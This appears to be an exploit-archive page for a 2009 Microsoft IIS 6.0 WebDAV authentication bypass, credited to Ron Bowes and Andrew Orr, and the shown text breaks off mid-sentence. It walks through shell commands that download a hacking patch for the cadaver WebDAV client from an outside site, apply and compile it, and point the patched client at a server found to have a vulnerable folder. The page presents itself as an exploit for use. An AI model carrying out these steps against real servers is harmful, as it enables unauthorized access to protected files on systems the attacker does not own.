Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)
# Published : 2009-05-21
# Author : Ron Bowes/Andrew Orr
# Previous Title : Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)
# Next Title : 2WIRE Gateway Authentication Bypass & Password Reset Vulnerabilities

# Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
# 
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# --snip--
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# --snip--
# > tar xzvf cadaver-0.23.2.tar.gz
# --snip--
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# --snip--
# > make
# --snip--
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a a